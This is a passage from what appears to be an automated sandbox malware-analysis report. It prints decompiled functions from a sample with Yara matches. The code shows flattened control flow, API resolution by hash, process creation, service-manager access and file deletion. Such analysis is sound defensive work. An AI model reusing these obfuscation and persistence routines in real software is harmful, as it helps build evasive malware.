                                              • Part of subcall function 00426011: GetSystemMetrics.USER32 ref: 0042602D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                            • String ID:
                                            • API String ID: 1031845853-0
                                            • Opcode ID: 49e5c97296a7b072187f1378aed9eba7ef52a70a37e1ec16940f220f5672bfea
                                            • Instruction ID: 659ed99cd56d5ad3ccdcd4dadc3a54c49a5c6667fc5102f6d19300758eb0a966
                                            • Opcode Fuzzy Hash: 49e5c97296a7b072187f1378aed9eba7ef52a70a37e1ec16940f220f5672bfea
                                            • Instruction Fuzzy Hash: BBF03030740704AEE230AB629C89B67B7A4EF80755F51442FFA0196290CFB498459FA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 71%
                                            			E022330D0() {
                                            				void* __ebx;
                                            				void* __ecx;
                                            				void* __ebp;
                                            				void* _t52;
                                            				intOrPtr* _t68;
                                            				void* _t71;
                                            				intOrPtr _t76;
                                            				intOrPtr _t77;
                                            				intOrPtr* _t85;
                                            				intOrPtr* _t90;
                                            				signed int _t95;
                                            				void* _t100;
                                            				void* _t101;
                                            				signed int _t102;
                                            				void* _t103;
                                            				void* _t104;
                                            
                                            				_t76 =  *((intOrPtr*)(_t103 + 0xc));
                                            				_t52 = 0x22788346;
                                            				_t102 =  *(_t103 + 0x10);
                                            				_t100 =  *(_t103 + 0x14);
                                            				_t95 =  *(_t103 + 0x18);
                                            				while(1) {
                                            					L1:
                                            					do {
                                            						while(1) {
                                            							L2:
                                            							_t104 = _t52 - 0xec2173f;
                                            							if(_t104 <= 0) {
                                            								break;
                                            							}
                                            							if(_t52 == 0x22788346) {
                                            								 *(_t103 + 0x10) = 0x3d53;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) << 5;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffff5fed;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 8;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffffd292;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 4;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) | 0x4ce86fd0;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 0xe;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) ^ 0x8e6c81db;
                                            								 *(_t103 + 0x18) = 0xed42;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 0xd;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xf090f06a;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x58;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 4;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0xffffb93b;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0x26;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) | 0xa9426d85;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x2a;
                                            								_t52 = 0x27153269;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xfad5ac24;
                                            								continue;
                                            							} else {
                                            								if(_t52 == 0x27153269) {
                                            									_t85 =  *0x223ddd0;
                                            									if(_t85 == 0) {
                                            										_t85 = E02233E80(_t76, E02233F20(0x7539f5a2), 0xf789cbad, _t102);
                                            										 *0x223ddd0 = _t85;
                                            									}
                                            									_t95 =  *_t85(_t102 + 0x2c);
                                            									_t52 = 0xb58c94f;
                                            									while(1) {
                                            										L1:
                                            										goto L2;
                                            									}
                                            								} else {
                                            									if(_t52 != 0x302165a1) {
                                            										goto L20;
                                            									} else {
                                            										_t52 =  ==  ? 0x7338f4f : 0xec2173f;
                                            										continue;
                                            									}
                                            								}
                                            							}
                                            							L30:
                                            						}
                                            						if(_t104 == 0) {
                                            							if(_t76 !=  *(_t103 + 0x10)) {
                                            								goto L29;
                                            							} else {
                                            								_t52 = 0x7338f4f;
                                            								goto L2;
                                            							}
                                            						} else {
                                            							if(_t52 == 0x26fef4f) {
                                            								_t90 =  *0x223e25c;
                                            								if(_t90 == 0) {
                                            									_t90 = E02233E80(_t76, E02233F20(0xbb398380), 0x5b27858b, _t102);
                                            									 *0x223e25c = _t90;
                                            								}
                                            								 *_t90(_t100 + 0x14, _t102 + 0x2c, (_t95 - _t102 - 0x2c >> 1) + 1);
                                            								_t77 =  *((intOrPtr*)(_t103 + 0x1c));
                                            								 *(_t100 + 0x224) =  *(_t77 + 0x1c);
                                            								 *((intOrPtr*)(_t77 + 4)) =  *((intOrPtr*)(_t77 + 4)) + 1;
                                            								 *(_t77 + 0x1c) = _t100;
                                            								goto L29;
                                            							} else {
                                            								if(_t52 == 0x7338f4f) {
                                            									_t68 =  *0x223dea8;
                                            									if(_t68 == 0) {
                                            										_t68 = E02233E80(_t76, E02233F20(0xbb398380), 0x97f883e, _t102);
                                            										 *0x223dea8 = _t68;
                                            									}
                                            									_t101 =  *_t68();
                                            									if( *0x223dcec == 0) {
                                            										 *0x223dcec = E02233E80(_t76, E02233F20(0xbb398380), 0xe9233692, _t102);
                                            									}
                                            									_t71 = RtlAllocateHeap(_t101, 8, 0x228); // executed
                                            									_t100 = _t71;
                                            									if(_t100 == 0) {
                                            										L29:
                                            										return 1;
                                            									} else {
                                            										_t52 = 0x26fef4f;
                                            										goto L1;
                                            									}
                                            								} else {
                                            									if(_t52 != 0xb58c94f) {
                                            										goto L20;
                                            									} else {
                                            										_t76 = E02233D10(_t95);
                                            										_t52 = 0x302165a1;
                                            										while(1) {
                                            											L1:
                                            											goto L2;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						goto L30;
                                            						L20:
                                            					} while (_t52 != 0x2c4ed872);
                                            					return 1;
                                            					goto L30;
                                            				}
                                            			}




















                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 02233182
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: &$B$S=
                                            • API String ID: 1279760036-3580750612
                                            • Opcode ID: 4b521b2d453ed485b4964c7d019078c9f0a1195a4c8206564795ce192a574a16
                                            • Instruction ID: 5fff627adcab5e9511c5d1e4d88bb91a0091beae034f6ef72a7779811a535692
                                            • Opcode Fuzzy Hash: 4b521b2d453ed485b4964c7d019078c9f0a1195a4c8206564795ce192a574a16
                                            • Instruction Fuzzy Hash: C451C7B1A243029BC719DEA8949852BB7E6FFD4744F104C5EF086CB258DB70DB498BD2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 412 4080e7-4080f8 413 40812a-40814e RtlAllocateHeap 412->413 414 4080fa-408117 HeapReAlloc 412->414 415 408150-408168 VirtualAlloc 413->415 416 40817a-40817c 413->416 414->416 417 408119-408125 414->417 418 40816a-408174 HeapFree 415->418 419 40817e-408193 415->419 420 408195-408197 416->420 417->413 418->416 419->420
                                            C-Code - Quality: 100%
                                            			E004080E7() {
                                            				signed int _t15;
                                            				void* _t17;
                                            				void* _t19;
                                            				void* _t25;
                                            				signed int _t26;
                                            				void* _t27;
                                            				intOrPtr* _t29;
                                            
                                            				_t15 =  *0x43b634; // 0x1
                                            				_t26 =  *0x43b624; // 0x10
                                            				if(_t15 != _t26) {
                                            					L3:
                                            					_t27 =  *0x43b638; // 0x22905a8
                                            					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
                                            					_t17 = RtlAllocateHeap( *0x43b63c, 8, 0x41c4); // executed
                                            					 *(_t29 + 0x10) = _t17;
                                            					if(_t17 == 0) {
                                            						L6:
                                            						return 0;
                                            					}
                                            					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4); // executed
                                            					 *(_t29 + 0xc) = _t19;
                                            					if(_t19 != 0) {
                                            						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
                                            						 *_t29 = 0;
                                            						 *((intOrPtr*)(_t29 + 4)) = 0;
                                            						 *0x43b634 =  *0x43b634 + 1;
                                            						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
                                            						return _t29;
                                            					}
                                            					HeapFree( *0x43b63c, 0,  *(_t29 + 0x10));
                                            					goto L6;
                                            				}
                                            				_t2 = _t26 * 4; // 0x60
                                            				_t25 = HeapReAlloc( *0x43b63c, 0,  *0x43b638, _t26 + _t2 + 0x50 << 2);
                                            				if(_t25 == 0) {
                                            					goto L6;
                                            				}
                                            				 *0x43b624 =  *0x43b624 + 0x10;
                                            				 *0x43b638 = _t25;
                                            				_t15 =  *0x43b634; // 0x1
                                            				goto L3;
                                            			}











                                            APIs
                                            • HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,00407EAF,00000000,?,?,?,004063F8), ref: 0040810F
                                            • RtlAllocateHeap.NTDLL(00000008,000041C4,00000000,00000000,00407EAF,00000000,?,?,?,004063F8), ref: 00408143
                                            • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,004063F8), ref: 0040815D
                                            • HeapFree.KERNEL32(00000000,?,?,004063F8), ref: 00408174
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Heap$Alloc$AllocateFreeVirtual
                                            • String ID:
                                            • API String ID: 1005975451-0
                                            • Opcode ID: 1221898d1fef6688b0745aebfb4c1bb27194800098e600c79b41635115f9dbec
                                            • Instruction ID: 7ee1ac0be71f7df2db9aeb831ea59f9b1f4a4243ff11ed4a701e61ad5814e4f6
                                            • Opcode Fuzzy Hash: 1221898d1fef6688b0745aebfb4c1bb27194800098e600c79b41635115f9dbec
                                            • Instruction Fuzzy Hash: 4A115870200301AFC7318F18EC46E6A7BB6FB947207505A3DF296DA1B1C770A813CB89
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 60%
                                            			E02234BA0(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
                                            				struct _STARTUPINFOW _v72;
                                            				struct _PROCESS_INFORMATION _v88;
                                            				intOrPtr* _t9;
                                            				int _t12;
                                            				intOrPtr* _t15;
                                            				intOrPtr* _t17;
                                            				WCHAR* _t44;
                                            				WCHAR* _t45;
                                            
                                            				_t46 = __ebp;
                                            				_t26 = __ebx;
                                            				_t9 =  *0x223e234;
                                            				_t45 = __edx;
                                            				_t44 = __ecx;
                                            				if(_t9 == 0) {
                                            					_t9 = E02233E80(__ebx, E02233F20(0xe66945e6), 0x8d9b356, __ebp);
                                            					 *0x223e234 = _t9;
                                            				}
                                            				 *_t9( &_v72, 0, 0x44);
                                            				_v72.cb = 0x44;
                                            				if( *0x223de64 == 0) {
                                            					 *0x223de64 = E02233E80(_t26, E02233F20(0xbb398380), 0xcbbf9e7f, _t46);
                                            				}
                                            				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
                                            				if(_t12 == 0) {
                                            					return 0;
                                            				} else {
                                            					if(_a12 == 0) {
                                            						_t15 =  *0x223dc70;
                                            						if(_t15 == 0) {
                                            							_t15 = E02233E80(_t26, E02233F20(0xbb398380), 0x560d239b, _t46);
                                            							 *0x223dc70 = _t15;
                                            						}
                                            						 *_t15(_v88.hProcess);
                                            						_t17 =  *0x223dc70;
                                            						if(_t17 == 0) {
                                            							_t17 = E02233E80(_t26, E02233F20(0xbb398380), 0x560d239b, _t46);
                                            							 *0x223dc70 = _t17;
                                            						}
                                            						 *_t17(_v88.hProcess);
                                            						return 1;
                                            					} else {
                                            						asm("movdqu xmm0, [esp+0x8]");
                                            						asm("movdqu [eax], xmm0");
                                            						return 1;
                                            					}
                                            				}
                                            			}












                                            APIs
                                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 02234C21
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID: D$Ei
                                            • API String ID: 963392458-592548167
                                            • Opcode ID: 536524d73150d234903e90576eaa7d9ed7a31ee2524f383329b7311f45224f6f
                                            • Instruction ID: db920037a7285f548e874873df86f1e5edc840882bf3a41fddc10e1a7f6bba8a
                                            • Opcode Fuzzy Hash: 536524d73150d234903e90576eaa7d9ed7a31ee2524f383329b7311f45224f6f
                                            • Instruction Fuzzy Hash: 6821B1B5B203026BE716EBF8AC54B6A37E2AFC0640F404C69F545CB284EFB4D9158BD1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 453 426474-42649f SetErrorMode * 2 call 424bfb * 2 458 4264c0-4264ca call 424bfb 453->458 459 4264a1-4264bb call 4264d7 453->459 463 4264d1-4264d4 458->463 464 4264cc call 412710 458->464 459->458 464->463
                                            C-Code - Quality: 100%
                                            			E00426474(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                            				signed short _t13;
                                            				void* _t16;
                                            				intOrPtr _t18;
                                            				void* _t20;
                                            				intOrPtr _t29;
                                            
                                            				_t13 = SetErrorMode(0); // executed
                                            				SetErrorMode(_t13 | 0x00008001); // executed
                                            				_t16 = E00424BFB();
                                            				_t29 = _a4;
                                            				 *((intOrPtr*)(_t16 + 8)) = _t29;
                                            				 *((intOrPtr*)(_t16 + 0xc)) = _t29;
                                            				_t18 =  *((intOrPtr*)(E00424BFB() + 4));
                                            				_t31 = _t18;
                                            				if(_t18 != 0) {
                                            					 *((intOrPtr*)(_t18 + 0x68)) = _t29;
                                            					 *((intOrPtr*)(_t18 + 0x6c)) = _a8;
                                            					 *((intOrPtr*)(_t18 + 0x70)) = _a12;
                                            					_t10 =  &_a16; // 0x406468
                                            					 *((intOrPtr*)(_t18 + 0x74)) =  *_t10;
                                            					E004264D7(_t18, _t31);
                                            				}
                                            				if( *((char*)(E00424BFB() + 0x14)) == 0) {
                                            					E00412710();
                                            				}
                                            				_t20 = 1;
                                            				return _t20;
                                            			}









                                            APIs
                                            • SetErrorMode.KERNELBASE(00000000,00000000,0041845B,00000000,00000000,00000000,00000000,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000,00406468), ref: 0042647D
                                            • SetErrorMode.KERNELBASE(00000000,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000,00406468,00000000), ref: 00426484
                                              • Part of subcall function 004264D7: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00426508
                                              • Part of subcall function 004264D7: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004265A9
                                              • Part of subcall function 004264D7: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004265D6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
                                            • String ID: hd@
                                            • API String ID: 3389432936-3469257913
                                            • Opcode ID: cd2bf83e0aada7a78a64cd33e34dd8ad1fec100a5d14c2182ee5260116b148ae
                                            • Instruction ID: 56c02cd2a0ca812c609797d7f3c2b0aa536ab85d6a731917afc158bbbb4402dc
                                            • Opcode Fuzzy Hash: cd2bf83e0aada7a78a64cd33e34dd8ad1fec100a5d14c2182ee5260116b148ae
                                            • Instruction Fuzzy Hash: F2F04F71A043205FD714FF25E484B0A7BD4AF44714F06844FF4889B3A2CBB8E841CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 509 22396b0-22396c7 510 22396d0-22396d5 509->510 511 2239833-2239838 510->511 512 22396db 510->512 515 22398d6-22398db 511->515 516 223983e 511->516 513 22396e1-22396e6 512->513 514 22397e7-223982e 512->514 519 22397cd-22397d2 513->519 520 22396ec 513->520 514->510 517 2239931-2239936 515->517 518 22398dd-22398e4 515->518 521 2239844-2239849 516->521 522 2239948-223994f 516->522 517->510 530 223993c-2239947 517->530 523 2239901-2239910 OpenSCManagerW 518->523 524 22398e6-22398fc call 2233f20 call 2233e80 518->524 519->517 525 22397d8-22397e2 call 2237ab0 519->525 526 22396f2-22396f7 520->526 527 223979c-22397a3 520->527 528 223984b-2239850 521->528 529 223987e-22398d1 521->529 531 2239951-2239967 call 2233f20 call 2233e80 522->531 532 223996c-2239977 522->532 537 2239912-2239922 523->537 538 2239927-223992c 523->538 524->523 525->510 535 22396f9-22396fe 526->535 536 223974e-2239755 526->536 539 22397c0-22397c8 527->539 540 22397a5-22397bb call 2233f20 call 2233e80 527->540 528->517 541 2239856-2239867 call 22342f0 528->541 529->510 531->532 547 223997b-223998d call 2233070 532->547 535->517 549 2239704-223970c 535->549 543 2239772-2239797 call 2233d10 536->543 544 2239757-223976d call 2233f20 call 2233e80 536->544 537->510 538->510 539->510 540->539 568 2239990-223999b 541->568 569 223986d-2239879 541->569 543->510 544->543 547->568 557 223970e-2239726 call 2233f20 call 2233e80 549->557 558 223972c-223973e 549->558 557->558 573 2239742-223974c 558->573 569->510 573->510
                                            C-Code - Quality: 73%
                                            			E022396B0() {
                                            				char _v524;
                                            				unsigned int _v528;
                                            				char _v536;
                                            				void* _v544;
                                            				void* __ebx;
                                            				void* _t44;
                                            				void* _t47;
                                            				void* _t51;
                                            				void* _t62;
                                            				void* _t66;
                                            				void* _t69;
                                            				intOrPtr _t79;
                                            				void* _t90;
                                            				signed int _t103;
                                            				void* _t116;
                                            				void* _t117;
                                            				void* _t118;
                                            				void* _t121;
                                            				void* _t122;
                                            
                                            				_t117 = _v528;
                                            				_t44 = 0x290b7473;
                                            				_t116 = 0;
                                            				_t2 = _t116 + 1; // 0x1
                                            				_t79 = _t2;
                                            				goto L1;
                                            				do {
                                            					while(1) {
                                            						L1:
                                            						_t121 = _t44 - 0x185037e0;
                                            						if(_t121 > 0) {
                                            							break;
                                            						}
                                            						if(_t121 == 0) {
                                            							_v528 = 0x9fb;
                                            							_v528 = _v528 ^ 0xe4a1a680;
                                            							_v528 = _v528 << 0xd;
                                            							_v528 = _v528 + 0xffffacfd;
                                            							_t80 = _v528;
                                            							_t44 = 0xac9ce62;
                                            							_v528 = (_v528 - (0x2f684bdb * _t80 >> 0x20) >> 1) + (0x2f684bdb * _t80 >> 0x20) >> 4;
                                            							_v528 = _v528 << 5;
                                            							_v528 = _v528 ^ 0x3febe949;
                                            							continue;
                                            						} else {
                                            							_t122 = _t44 - 0xac9ce62;
                                            							if(_t122 > 0) {
                                            								__eflags = _t44 - 0x143d843a;
                                            								if(_t44 != 0x143d843a) {
                                            									goto L32;
                                            								} else {
                                            									E02237AB0(_t118);
                                            									_t44 = 0x28458a2;
                                            									continue;
                                            								}
                                            							} else {
                                            								if(_t122 == 0) {
                                            									_t66 =  *0x223ddb8;
                                            									__eflags = _t66;
                                            									if(_t66 == 0) {
                                            										_t66 = E02233E80(_t79, E02233F20(0x667fdee), 0x505cb3fe, _t118);
                                            										 *0x223ddb8 = _t66;
                                            									}
                                            									 *_t66(_t117);
                                            									_t44 = 0x67ba340;
                                            									continue;
                                            								} else {
                                            									if(_t44 == 0x28458a2) {
                                            										_t69 =  *0x223de58;
                                            										__eflags = _t69;
                                            										if(_t69 == 0) {
                                            											_t69 = E02233E80(_t79, E02233F20(0xbb398380), 0xb1aefb5, _t118);
                                            											 *0x223de58 = _t69;
                                            										}
                                            										 *_t69(0,  &_v524, 0x104);
                                            										 *((intOrPtr*)( *0x223e2ec + 0x48)) = E02233D10( &_v536);
                                            										_t44 = 0x311c267c;
                                            										continue;
                                            									} else {
                                            										if(_t44 != 0x67ba340) {
                                            											goto L32;
                                            										} else {
                                            											_t90 =  *0x223df38;
                                            											if(_t90 == 0) {
                                            												_t90 = E02233E80(_t79, E02233F20(0xf9c30097), 0x62c574d8, _t118);
                                            												 *0x223df38 = _t90;
                                            											}
                                            											 *_t90(0, _v528, 0, 0,  *0x223e2ec + 0x5c); // executed
                                            											_t44 = 0x143d843a;
                                            											_t116 =  ==  ? _t79 : _t116;
                                            											continue;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						L38:
                                            					}
                                            					__eflags = _t44 - 0x311c267c;
                                            					if(__eflags > 0) {
                                            						__eflags = _t44 - 0x37104f21;
                                            						if(_t44 != 0x37104f21) {
                                            							goto L32;
                                            						} else {
                                            							__eflags =  *0x223e0f4;
                                            							if( *0x223e0f4 == 0) {
                                            								 *0x223e0f4 = E02233E80(_t79, E02233F20(0x667fdee), 0x7f692adf, _t118);
                                            							}
                                            							_t47 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                            							_t117 = _t47;
                                            							__eflags = _t117;
                                            							if(_t117 == 0) {
                                            								_t44 = 0x25965b99;
                                            							} else {
                                            								 *((intOrPtr*)( *0x223e2ec + 0x268)) = _t79;
                                            								_t44 = 0x185037e0;
                                            							}
                                            							goto L1;
                                            						}
                                            					} else {
                                            						if(__eflags == 0) {
                                            							_t51 =  *0x223df38;
                                            							__eflags = _t51;
                                            							if(_t51 == 0) {
                                            								_t51 = E02233E80(_t79, E02233F20(0xf9c30097), 0x62c574d8, _t118);
                                            								 *0x223df38 = _t51;
                                            							}
                                            							 *_t51(0, 0x25, 0, 0,  &_v524); // executed
                                            							__eflags =  *0x223e2ec + 0x10;
                                            							E02233070( *0x223e2ec + 0x10);
                                            							goto L37;
                                            						} else {
                                            							__eflags = _t44 - 0x25965b99;
                                            							if(_t44 == 0x25965b99) {
                                            								_v528 = 0x4b7f;
                                            								_v528 = _v528 + 0xffffece0;
                                            								_t103 = (_v528 - (0x3521cfb3 * _v528 >> 0x20) >> 1) + (0x3521cfb3 * _v528 >> 0x20) >> 5;
                                            								_v528 = _t103;
                                            								_v528 = (_t103 << 5) + _v528;
                                            								_v528 = _v528 >> 2;
                                            								_v528 = _v528 ^ 0x000008d8;
                                            								 *((intOrPtr*)( *0x223e2ec + 0x3c)) = 0x2237c60;
                                            								_t44 = 0x67ba340;
                                            								goto L1;
                                            							} else {
                                            								__eflags = _t44 - 0x290b7473;
                                            								if(_t44 != 0x290b7473) {
                                            									goto L32;
                                            								} else {
                                            									_t62 = E022342F0(_t79, 0x480);
                                            									 *0x223e2ec = _t62;
                                            									__eflags = _t62;
                                            									if(_t62 == 0) {
                                            										L37:
                                            										return _t116;
                                            									} else {
                                            										 *((intOrPtr*)(_t62 + 0x38)) = E02237C70;
                                            										_t44 = 0x37104f21;
                                            										goto L1;
                                            									}
                                            								}
                                            							}
                                            						}
                                            					}
                                            					goto L38;
                                            					L32:
                                            					__eflags = _t44 - 0x20400186;
                                            				} while (_t44 != 0x20400186);
                                            				return _t116;
                                            				goto L38;
                                            			}























                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,2564BE4F), ref: 0223990A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ManagerOpen
                                            • String ID: I?
                                            • API String ID: 1889721586-46180575
                                            • Opcode ID: 2749825edf48c7f3080661e428605f2843cf51b5f08e946edfa35d31db166a29
                                            • Instruction ID: 7bce76cf15e94b2db8bc3bd0ca74a9948bd54370196055916d7e0e24bc8ea054
                                            • Opcode Fuzzy Hash: 2749825edf48c7f3080661e428605f2843cf51b5f08e946edfa35d31db166a29
                                            • Instruction Fuzzy Hash: 2C61E4F1B243015FD729DEE9A48572B33A6AB81714F40881EF556CB388DBB8D844CF82
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 71%
                                            			E022336B0(void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                            				char _v520;
                                            				intOrPtr* _t3;
                                            				intOrPtr* _t5;
                                            				intOrPtr* _t7;
                                            				int _t10;
                                            				void* _t16;
                                            				void* _t34;
                                            				void* _t35;
                                            				void* _t38;
                                            				void* _t40;
                                            				void* _t41;
                                            				WCHAR* _t42;
                                            
                                            				_t41 =  &_v520;
                                            				_t34 = __ecx;
                                            				_t38 = E022334C0(0x223d210);
                                            				_t3 =  *0x223dc60;
                                            				if(_t3 == 0) {
                                            					_t3 = E02233E80(_t16, E02233F20(0xe66945e6), 0xcca28b0d, _t40);
                                            					 *0x223dc60 = _t3;
                                            				}
                                            				 *_t3( &_v520, 0x104, _t38, _t34);
                                            				_t5 =  *0x223dea8;
                                            				_t42 = _t41 + 0x10;
                                            				if(_t5 == 0) {
                                            					_t5 = E02233E80(_t16, E02233F20(0xbb398380), 0x97f883e, _t40);
                                            					 *0x223dea8 = _t5;
                                            				}
                                            				_t35 =  *_t5();
                                            				_t7 =  *0x223e1a0;
                                            				if(_t7 == 0) {
                                            					_t7 = E02233E80(_t16, E02233F20(0xbb398380), 0x26c3f343, _t40);
                                            					 *0x223e1a0 = _t7;
                                            				}
                                            				 *_t7(_t35, 0, _t38);
                                            				if( *0x223df94 == 0) {
                                            					 *0x223df94 = E02233E80(_t16, E02233F20(0xbb398380), 0x86a49eb, _t40);
                                            				}
                                            				_t10 = DeleteFileW(_t42); // executed
                                            				return _t10;
                                            			}
















                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID: Ei
                                            • API String ID: 4033686569-3988083245
                                            • Opcode ID: 1a4eab572f3a903765ff23fe26fc2c1c4aad65efcaaf226eb19d3f89378d6d87
                                            • Instruction ID: e363d03a30651d21ca349afa6a17c5988db6a07cb8dc1d62208121304cbc8ded
                                            • Opcode Fuzzy Hash: 1a4eab572f3a903765ff23fe26fc2c1c4aad65efcaaf226eb19d3f89378d6d87
                                            • Instruction Fuzzy Hash: CD11BFB5F203016BD715F7F4A894A6B36E7AFC0644B04086CE456CB248EE78CA118BE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 88%
                                            			E00412710() {
                                            				void* _t6;
                                            				void* _t7;
                                            				struct HHOOK__* _t9;
                                            				void* _t18;
                                            
